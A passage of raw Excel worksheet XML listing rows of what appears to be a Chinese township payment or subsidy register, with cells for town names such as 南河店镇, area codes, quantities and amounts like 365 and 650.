        <v>225</v>
      </c>
    </row>
    <row r="2401" s="6" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2401" s="16" t="s">
        <v>6307</v>
      </c>
      <c r="B2401" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2401" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2401" s="17" t="s">
        <v>6308</v>
      </c>
      <c r="E2401" s="17" t="s">
        <v>6309</v>
      </c>
      <c r="F2401" s="17" t="s">
        <v>6233</v>
      </c>
      <c r="G2401" s="17">
        <v>1</v>
      </c>
      <c r="H2401" s="18">
        <v>365</v>
      </c>
      <c r="I2401" s="17">
        <f t="shared" si="114"/>
        <v>365</v>
      </c>
      <c r="J2401" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2401" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2402" s="6" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2402" s="16" t="s">
        <v>6310</v>
      </c>
      <c r="B2402" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2402" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D2402" s="17" t="s">
        <v>6311</v>
      </c>
      <c r="E2402" s="17" t="s">
        <v>6312</v>
      </c>
      <c r="F2402" s="17" t="s">
        <v>6233</v>
      </c>
      <c r="G2402" s="17">
        <v>1</v>
      </c>
      <c r="H2402" s="18">
        <v>365</v>
      </c>
      <c r="I2402" s="17">
        <f t="shared" si="114"/>
        <v>365</v>
      </c>
      <c r="J2402" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2402" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2403" s="6" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2403" s="16" t="s">
        <v>6313</v>
      </c>
      <c r="B2403" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2403" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2403" s="17" t="s">
        <v>6314</v>
      </c>
      <c r="E2403" s="17" t="s">
        <v>6315</v>
      </c>
      <c r="F2403" s="17" t="s">
        <v>6233</v>
      </c>
      <c r="G2403" s="17">
        <v>1</v>
      </c>
      <c r="H2403" s="18">
        <v>365</v>
      </c>
      <c r="I2403" s="17">
        <f t="shared" si="114"/>
        <v>365</v>
      </c>
      <c r="J2403" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2403" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2404" s="6" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2404" s="16" t="s">
        <v>6316</v>
      </c>
      <c r="B2404" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2404" s="17" t="s">
        <v>6038</v>
      </c>
      <c r="D2404" s="17" t="s">
        <v>6317</v>
      </c>
      <c r="E2404" s="17" t="s">
        <v>6318</v>
      </c>
      <c r="F2404" s="17" t="s">
        <v>6233</v>
      </c>
      <c r="G2404" s="17">
        <v>1</v>
      </c>
      <c r="H2404" s="18">
        <v>365</v>
      </c>
      <c r="I2404" s="17">
        <f t="shared" si="114"/>
        <v>365</v>
      </c>
      <c r="J2404" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2404" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2405" s="6" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2405" s="16" t="s">
        <v>6319</v>
      </c>
      <c r="B2405" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2405" s="17" t="s">
        <v>3457</v>
      </c>
      <c r="D2405" s="17" t="s">
        <v>6320</v>
      </c>
      <c r="E2405" s="17" t="s">
        <v>6321</v>
      </c>
      <c r="F2405" s="17" t="s">
        <v>6233</v>
      </c>
      <c r="G2405" s="17">
        <v>1</v>
      </c>
      <c r="H2405" s="18">
        <v>365</v>
      </c>
      <c r="I2405" s="17">
        <f t="shared" si="114"/>
        <v>365</v>
      </c>
      <c r="J2405" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2405" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2406" s="6" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2406" s="16" t="s">
        <v>6322</v>
      </c>
      <c r="B2406" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2406" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D2406" s="17" t="s">
        <v>6323</v>
      </c>
      <c r="E2406" s="17" t="s">
        <v>493</v>
      </c>
      <c r="F2406" s="17" t="s">
        <v>6233</v>
      </c>
      <c r="G2406" s="17">
        <v>2</v>
      </c>
      <c r="H2406" s="18">
        <v>355</v>
      </c>
      <c r="I2406" s="17">
        <f t="shared" si="114"/>
        <v>710</v>
      </c>
      <c r="J2406" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2406" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2407" s="6" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2407" s="16" t="s">
        <v>6324</v>
      </c>
      <c r="B2407" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2407" s="6" t="str">
        <f>C2406</f>
        <v>校委会</v>
      </c>
      <c r="D2407" s="89" t="s">
        <v>6325</v>
      </c>
      <c r="E2407" s="47" t="s">
        <v>6326</v>
      </c>
      <c r="F2407" s="17" t="str">
        <f>F2406</f>
        <v>4113211124</v>
      </c>
      <c r="G2407" s="17"/>
      <c r="H2407" s="17"/>
      <c r="I2407" s="17"/>
      <c r="J2407" s="17"/>
      <c r="K2407" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2408" s="6" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2408" s="16" t="s">
        <v>6327</v>
      </c>
      <c r="B2408" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2408" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D2408" s="17" t="s">
        <v>2941</v>
      </c>
      <c r="E2408" s="17" t="s">
        <v>6241</v>
      </c>
      <c r="F2408" s="17" t="s">
        <v>6233</v>
      </c>
      <c r="G2408" s="17">
        <v>1</v>
      </c>
      <c r="H2408" s="18">
        <v>365</v>
      </c>
      <c r="I2408" s="17">
        <f t="shared" ref="I2408:I2423" si="115">H2408*G2408</f>
        <v>365</v>
      </c>
      <c r="J2408" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2408" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2409" s="6" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2409" s="16" t="s">
        <v>6328</v>
      </c>
      <c r="B2409" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2409" s="17" t="s">
        <v>6329</v>
      </c>
      <c r="D2409" s="17" t="s">
        <v>6330</v>
      </c>
      <c r="E2409" s="17" t="s">
        <v>3979</v>
      </c>
      <c r="F2409" s="17" t="s">
        <v>6331</v>
      </c>
      <c r="G2409" s="17">
        <v>1</v>
      </c>
      <c r="H2409" s="18">
        <v>365</v>
      </c>
      <c r="I2409" s="17">
        <f t="shared" si="115"/>
        <v>365</v>
      </c>
      <c r="J2409" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2409" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2410" s="6" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2410" s="16" t="s">
        <v>6332</v>
      </c>
      <c r="B2410" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2410" s="17" t="s">
        <v>6333</v>
      </c>
      <c r="D2410" s="17" t="s">
        <v>6334</v>
      </c>
      <c r="E2410" s="17" t="s">
        <v>6335</v>
      </c>
      <c r="F2410" s="17" t="s">
        <v>6336</v>
      </c>
      <c r="G2410" s="17">
        <v>1</v>
      </c>
      <c r="H2410" s="18">
        <v>365</v>
      </c>
      <c r="I2410" s="17">
        <f t="shared" si="115"/>
        <v>365</v>
      </c>
      <c r="J2410" s="17" t="s">
        <v>4693</v>
      </c>
      <c r="K2410" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2411" s="6" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2411" s="16" t="s">
        <v>6337</v>
      </c>
      <c r="B2411" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2411" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2411" s="17" t="s">
        <v>6338</v>
      </c>
      <c r="E2411" s="17" t="s">
        <v>6339</v>
      </c>
      <c r="F2411" s="17" t="s">
        <v>6233</v>
      </c>
      <c r="G2411" s="17">
        <v>1</v>
      </c>
      <c r="H2411" s="18">
        <v>365</v>
      </c>
      <c r="I2411" s="17">
        <f t="shared" si="115"/>
        <v>365</v>
      </c>
      <c r="J2411" s="17" t="s">
        <v>4642</v>
      </c>
      <c r="K2411" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2412" s="6" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2412" s="16" t="s">
        <v>6340</v>
      </c>
      <c r="B2412" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2412" s="17" t="s">
        <v>6341</v>
      </c>
      <c r="D2412" s="17" t="s">
        <v>1195</v>
      </c>
      <c r="E2412" s="17" t="s">
        <v>6258</v>
      </c>
      <c r="F2412" s="17" t="s">
        <v>6233</v>
      </c>
      <c r="G2412" s="17">
        <v>1</v>
      </c>
      <c r="H2412" s="18">
        <v>365</v>
      </c>
      <c r="I2412" s="17">
        <f t="shared" si="115"/>
        <v>365</v>
      </c>
      <c r="J2412" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2412" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2413" customHeight="1" spans="1:11">
      <c r="A2413" s="16" t="s">
        <v>6342</v>
      </c>
      <c r="B2413" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2413" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="D2413" s="17" t="s">
        <v>6344</v>
      </c>
      <c r="E2413" s="17" t="s">
        <v>6345</v>
      </c>
      <c r="F2413" s="17" t="s">
        <v>6346</v>
      </c>
      <c r="G2413" s="17">
        <v>1</v>
      </c>
      <c r="H2413" s="18">
        <v>365</v>
      </c>
      <c r="I2413" s="17">
        <f t="shared" si="115"/>
        <v>365</v>
      </c>
      <c r="J2413" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2413" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2414" customHeight="1" spans="1:11">
      <c r="A2414" s="16" t="s">
        <v>6347</v>
      </c>
      <c r="B2414" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2414" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="D2414" s="17" t="s">
        <v>6348</v>
      </c>
      <c r="E2414" s="17" t="s">
        <v>6349</v>
      </c>
      <c r="F2414" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2414" s="17">
        <v>1</v>
      </c>
      <c r="H2414" s="18">
        <v>365</v>
      </c>
      <c r="I2414" s="17">
        <f t="shared" si="115"/>
        <v>365</v>
      </c>
      <c r="J2414" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2414" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2415" customHeight="1" spans="1:11">
      <c r="A2415" s="16" t="s">
        <v>6351</v>
      </c>
      <c r="B2415" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2415" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="D2415" s="17" t="s">
        <v>6352</v>
      </c>
      <c r="E2415" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F2415" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2415" s="17">
        <v>1</v>
      </c>
      <c r="H2415" s="18">
        <v>365</v>
      </c>
      <c r="I2415" s="17">
        <f t="shared" si="115"/>
        <v>365</v>
      </c>
      <c r="J2415" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2415" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2416" customHeight="1" spans="1:11">
      <c r="A2416" s="16" t="s">
        <v>6353</v>
      </c>
      <c r="B2416" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2416" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="D2416" s="17" t="s">
        <v>6354</v>
      </c>
      <c r="E2416" s="17" t="s">
        <v>6355</v>
      </c>
      <c r="F2416" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2416" s="17">
        <v>2</v>
      </c>
      <c r="H2416" s="18">
        <v>325</v>
      </c>
      <c r="I2416" s="17">
        <f t="shared" si="115"/>
        <v>650</v>
      </c>
      <c r="J2416" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2416" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2417" customHeight="1" spans="1:11">
      <c r="A2417" s="16" t="s">
        <v>6356</v>
      </c>
      <c r="B2417" s="17" t="str">
        <f>B2416</f>
        <v>南河店镇</v>
      </c>
      <c r="C2417" s="17" t="str">
        <f>C2416</f>
        <v>南河店镇</v>
      </c>
      <c r="D2417" s="23" t="s">
        <v>6357</v>
      </c>
      <c r="E2417" s="24" t="s">
        <v>6358</v>
      </c>
      <c r="F2417" s="17" t="str">
        <f>F2416</f>
        <v>4113211004</v>
      </c>
      <c r="G2417" s="17"/>
      <c r="H2417" s="17"/>
      <c r="I2417" s="17"/>
      <c r="J2417" s="17"/>
      <c r="K2417" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2418" customHeight="1" spans="1:11">
      <c r="A2418" s="16" t="s">
        <v>6359</v>
      </c>
      <c r="B2418" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2418" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="D2418" s="17" t="s">
        <v>6360</v>
      </c>
      <c r="E2418" s="17" t="s">
        <v>6361</v>
      </c>
      <c r="F2418" s="17" t="s">
        <v>6346</v>
      </c>
      <c r="G2418" s="17">
        <v>1</v>
      </c>
      <c r="H2418" s="18">
        <v>365</v>
      </c>
      <c r="I2418" s="17">
        <f>H2418*G2418</f>
        <v>365</v>
      </c>
      <c r="J2418" s="17" t="s">
        <v>5963</v>
      </c>
      <c r="K2418" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2419" customHeight="1" spans="1:11">
      <c r="A2419" s="16" t="s">
        <v>6362</v>
      </c>
      <c r="B2419" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2419" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="D2419" s="17" t="s">
        <v>6363</v>
      </c>
      <c r="E2419" s="17" t="s">
        <v>2636</v>
      </c>
      <c r="F2419" s="17" t="s">
        <v>6364</v>
      </c>
      <c r="G2419" s="17">
        <v>1</v>
      </c>
      <c r="H2419" s="18">
        <v>365</v>
      </c>
      <c r="I2419" s="17">
        <f>H2419*G2419</f>
        <v>365</v>
      </c>
      <c r="J2419" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2419" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2420" customHeight="1" spans="1:11">
      <c r="A2420" s="16" t="s">
        <v>6365</v>
      </c>
      <c r="B2420" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2420" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="D2420" s="17" t="s">
        <v>6366</v>
      </c>
      <c r="E2420" s="17" t="s">
        <v>6367</v>
      </c>
      <c r="F2420" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2420" s="17">
        <v>2</v>
      </c>
      <c r="H2420" s="18">
        <v>325</v>
      </c>
      <c r="I2420" s="17">
        <f>H2420*G2420</f>
        <v>650</v>
      </c>
      <c r="J2420" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2420" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2421" customHeight="1" spans="1:11">
      <c r="A2421" s="16" t="s">
        <v>6368</v>
      </c>
      <c r="B2421" s="17" t="str">
        <f>B2420</f>
        <v>南河店镇</v>
      </c>
      <c r="C2421" s="17" t="str">
        <f>C2420</f>
        <v>南河店镇</v>
      </c>
      <c r="D2421" s="23" t="s">
        <v>6369</v>
      </c>
      <c r="E2421" s="24" t="s">
        <v>6370</v>
      </c>
      <c r="F2421" s="17" t="str">
        <f>F2420</f>
        <v>4113211004</v>
      </c>
      <c r="G2421" s="17"/>
      <c r="H2421" s="17"/>
      <c r="I2421" s="17"/>
      <c r="J2421" s="17"/>
      <c r="K2421" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2422" customHeight="1" spans="1:11">
      <c r="A2422" s="16" t="s">
        <v>6371</v>
      </c>
      <c r="B2422" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2422" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="D2422" s="17" t="s">
        <v>6372</v>
      </c>
      <c r="E2422" s="17" t="s">
        <v>6373</v>
      </c>
      <c r="F2422" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2422" s="17">
        <v>1</v>
      </c>
      <c r="H2422" s="18">
        <v>365</v>
      </c>
      <c r="I2422" s="17">
        <f>H2422*G2422</f>
        <v>365</v>
      </c>
      <c r="J2422" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2422" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2423" customHeight="1" spans="1:11">
      <c r="A2423" s="16" t="s">
        <v>6374</v>
      </c>
      <c r="B2423" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2423" s="17" t="s">
        <v>6375</v>
      </c>
      <c r="D2423" s="17" t="s">
        <v>6376</v>
      </c>
      <c r="E2423" s="17" t="s">
        <v>6377</v>
      </c>
      <c r="F2423" s="17" t="s">
        <v>6378</v>
      </c>
      <c r="G2423" s="17">
        <v>2</v>
      </c>
      <c r="H2423" s="18">
        <v>325</v>
      </c>
      <c r="I2423" s="17">
        <f>H2423*G2423</f>
        <v>650</v>
      </c>
      <c r="J2423" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2423" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2424" customHeight="1" spans="1:11">
      <c r="A2424" s="16" t="s">
        <v>6379</v>
      </c>
      <c r="B2424" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2424" s="17" t="s">
        <v>6375</v>
      </c>
      <c r="D2424" s="25" t="s">
        <v>6380</v>
      </c>
      <c r="E2424" s="25" t="s">
        <v>6381</v>
      </c>
      <c r="F2424" s="17" t="s">
        <v>6378</v>
      </c>
      <c r="G2424" s="17"/>
      <c r="H2424" s="17"/>
      <c r="I2424" s="17"/>
      <c r="J2424" s="17"/>
      <c r="K2424" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2425" customHeight="1" spans="1:11">
      <c r="A2425" s="16" t="s">
        <v>6382</v>
      </c>
      <c r="B2425" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2425" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2425" s="17" t="s">
        <v>6383</v>
      </c>
      <c r="E2425" s="17" t="s">
        <v>6384</v>
      </c>
      <c r="F2425" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2425" s="17">
        <v>1</v>
      </c>
      <c r="H2425" s="18">
        <v>365</v>
      </c>
      <c r="I2425" s="17">
        <f t="shared" ref="I2425:I2432" si="116">H2425*G2425</f>
        <v>365</v>
      </c>
      <c r="J2425" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2425" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2426" customHeight="1" spans="1:11">
      <c r="A2426" s="16" t="s">
        <v>6385</v>
      </c>
      <c r="B2426" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2426" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2426" s="17" t="s">
        <v>6386</v>
      </c>
      <c r="E2426" s="17" t="s">
        <v>6387</v>
      </c>
      <c r="F2426" s="17" t="s">
        <v>6388</v>
      </c>
      <c r="G2426" s="17">
        <v>1</v>
      </c>
      <c r="H2426" s="18">
        <v>365</v>
      </c>
      <c r="I2426" s="17">
        <f t="shared" si="116"/>
        <v>365</v>
      </c>
      <c r="J2426" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2426" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2427" customHeight="1" spans="1:11">
      <c r="A2427" s="16" t="s">
        <v>6389</v>
      </c>
      <c r="B2427" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2427" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2427" s="17" t="s">
        <v>6390</v>
      </c>
      <c r="E2427" s="17" t="s">
        <v>2971</v>
      </c>
      <c r="F2427" s="17" t="s">
        <v>6364</v>
      </c>
      <c r="G2427" s="17">
        <v>1</v>
      </c>
      <c r="H2427" s="18">
        <v>365</v>
      </c>
      <c r="I2427" s="17">
        <f t="shared" si="116"/>
        <v>365</v>
      </c>
      <c r="J2427" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2427" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2428" customHeight="1" spans="1:11">
      <c r="A2428" s="16" t="s">
        <v>6391</v>
      </c>
      <c r="B2428" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2428" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2428" s="17" t="s">
        <v>6392</v>
      </c>
      <c r="E2428" s="17" t="s">
        <v>6393</v>
      </c>
      <c r="F2428" s="17" t="s">
        <v>6388</v>
      </c>
      <c r="G2428" s="17">
        <v>1</v>
      </c>
      <c r="H2428" s="18">
        <v>365</v>
      </c>
      <c r="I2428" s="17">
        <f t="shared" si="116"/>
        <v>365</v>
      </c>
      <c r="J2428" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2428" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2429" customHeight="1" spans="1:11">
      <c r="A2429" s="16" t="s">
        <v>6394</v>
      </c>
      <c r="B2429" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2429" s="17" t="s">
        <v>6127</v>
      </c>
      <c r="D2429" s="17" t="s">
        <v>6395</v>
      </c>
      <c r="E2429" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F2429" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2429" s="17">
        <v>1</v>
      </c>
      <c r="H2429" s="18">
        <v>365</v>
      </c>
      <c r="I2429" s="17">
        <f t="shared" si="116"/>
        <v>365</v>
      </c>
      <c r="J2429" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2429" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2430" customHeight="1" spans="1:11">
      <c r="A2430" s="16" t="s">
        <v>6396</v>
      </c>
      <c r="B2430" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2430" s="17" t="s">
        <v>6127</v>
      </c>
      <c r="D2430" s="17" t="s">
        <v>6397</v>
      </c>
      <c r="E2430" s="17" t="s">
        <v>6398</v>
      </c>
      <c r="F2430" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2430" s="17">
        <v>1</v>
      </c>
      <c r="H2430" s="18">
        <v>365</v>
      </c>
      <c r="I2430" s="17">
        <f t="shared" si="116"/>
        <v>365</v>
      </c>
      <c r="J2430" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2430" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2431" customHeight="1" spans="1:11">
      <c r="A2431" s="16" t="s">
        <v>6399</v>
      </c>
      <c r="B2431" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2431" s="17" t="s">
        <v>6127</v>
      </c>
      <c r="D2431" s="17" t="s">
        <v>6400</v>
      </c>
      <c r="E2431" s="17" t="s">
        <v>6401</v>
      </c>
      <c r="F2431" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2431" s="17">
        <v>1</v>
      </c>
      <c r="H2431" s="18">
        <v>365</v>
      </c>
      <c r="I2431" s="17">
        <f t="shared" si="116"/>
        <v>365</v>
      </c>
      <c r="J2431" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2431" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2432" customHeight="1" spans="1:11">
      <c r="A2432" s="16" t="s">
        <v>6402</v>
      </c>
      <c r="B2432" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2432" s="17" t="s">
        <v>6127</v>
      </c>
      <c r="D2432" s="17" t="s">
        <v>6403</v>
      </c>
      <c r="E2432" s="17" t="s">
        <v>6404</v>
      </c>
      <c r="F2432" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2432" s="17">
        <v>2</v>
      </c>
      <c r="H2432" s="18">
        <v>325</v>
      </c>
      <c r="I2432" s="17">
        <f t="shared" si="116"/>
        <v>650</v>
      </c>
      <c r="J2432" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2432" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2433" customHeight="1" spans="1:11">
      <c r="A2433" s="16" t="s">
        <v>6405</v>
      </c>
      <c r="B2433" s="17" t="str">
        <f>B2432</f>
        <v>南河店镇</v>
      </c>
      <c r="C2433" s="17" t="str">
        <f>C2432</f>
        <v>粮食局</v>
      </c>
      <c r="D2433" s="23" t="s">
        <v>6406</v>
      </c>
      <c r="E2433" s="24" t="s">
        <v>6381</v>
      </c>
      <c r="F2433" s="17" t="str">
        <f>F2432</f>
        <v>4113211004</v>
      </c>
      <c r="G2433" s="17"/>
      <c r="H2433" s="17"/>
      <c r="I2433" s="17"/>
      <c r="J2433" s="17"/>
      <c r="K2433" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2434" customHeight="1" spans="1:11">
      <c r="A2434" s="16" t="s">
        <v>6407</v>
      </c>
      <c r="B2434" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2434" s="17" t="s">
        <v>6127</v>
      </c>
      <c r="D2434" s="17" t="s">
        <v>6408</v>
      </c>
      <c r="E2434" s="17" t="s">
        <v>6393</v>
      </c>
      <c r="F2434" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2434" s="17">
        <v>1</v>
      </c>
      <c r="H2434" s="18">
        <v>365</v>
      </c>
      <c r="I2434" s="17">
        <f>H2434*G2434</f>
        <v>365</v>
      </c>
      <c r="J2434" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2434" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2435" customHeight="1" spans="1:11">
      <c r="A2435" s="16" t="s">
        <v>6409</v>
      </c>
      <c r="B2435" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2435" s="17" t="s">
        <v>6410</v>
      </c>
      <c r="D2435" s="17" t="s">
        <v>6411</v>
      </c>
      <c r="E2435" s="17" t="s">
        <v>6309</v>
      </c>
      <c r="F2435" s="17" t="s">
        <v>6346</v>
      </c>
      <c r="G2435" s="17">
        <v>1</v>
      </c>
      <c r="H2435" s="18">
        <v>365</v>
      </c>
      <c r="I2435" s="17">
        <f>H2435*G2435</f>
        <v>365</v>
      </c>
      <c r="J2435" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2435" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2436" customHeight="1" spans="1:11">
      <c r="A2436" s="16" t="s">
        <v>6412</v>
      </c>
      <c r="B2436" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2436" s="17" t="s">
        <v>6410</v>
      </c>
      <c r="D2436" s="17" t="s">
        <v>6413</v>
      </c>
      <c r="E2436" s="17" t="s">
        <v>6414</v>
      </c>
      <c r="F2436" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2436" s="17">
        <v>1</v>
      </c>
      <c r="H2436" s="18">
        <v>365</v>
      </c>
      <c r="I2436" s="17">
        <f>H2436*G2436</f>
        <v>365</v>
      </c>
      <c r="J2436" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2436" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2437" customHeight="1" spans="1:11">
      <c r="A2437" s="16" t="s">
        <v>6415</v>
      </c>
      <c r="B2437" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2437" s="17" t="s">
        <v>6410</v>
      </c>
      <c r="D2437" s="17" t="s">
        <v>6416</v>
      </c>
      <c r="E2437" s="17" t="s">
        <v>6417</v>
      </c>
      <c r="F2437" s="17" t="s">
        <v>6346</v>
      </c>
      <c r="G2437" s="17">
        <v>1</v>
      </c>
      <c r="H2437" s="18">
        <v>365</v>
      </c>
      <c r="I2437" s="17">
        <f>H2437*G2437</f>
        <v>365</v>
      </c>
      <c r="J2437" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2437" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2438" customHeight="1" spans="1:11">
      <c r="A2438" s="16" t="s">
        <v>6418</v>
      </c>
      <c r="B2438" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2438" s="17" t="s">
        <v>5374</v>
      </c>
      <c r="D2438" s="17" t="s">
        <v>6419</v>
      </c>
      <c r="E2438" s="17" t="s">
        <v>1297</v>
      </c>
      <c r="F2438" s="17" t="s">
        <v>6346</v>
      </c>
      <c r="G2438" s="17">
        <v>2</v>
      </c>
      <c r="H2438" s="18">
        <v>325</v>
      </c>
      <c r="I2438" s="17">
        <f>H2438*G2438</f>
        <v>650</v>
      </c>
      <c r="J2438" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2438" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2439" customHeight="1" spans="1:11">
      <c r="A2439" s="16" t="s">
        <v>6420</v>
      </c>
      <c r="B2439" s="17" t="str">
        <f>B2438</f>
        <v>南河店镇</v>
      </c>
      <c r="C2439" s="17" t="str">
        <f>C2438</f>
        <v>商业中心</v>
      </c>
      <c r="D2439" s="16" t="s">
        <v>6421</v>
      </c>
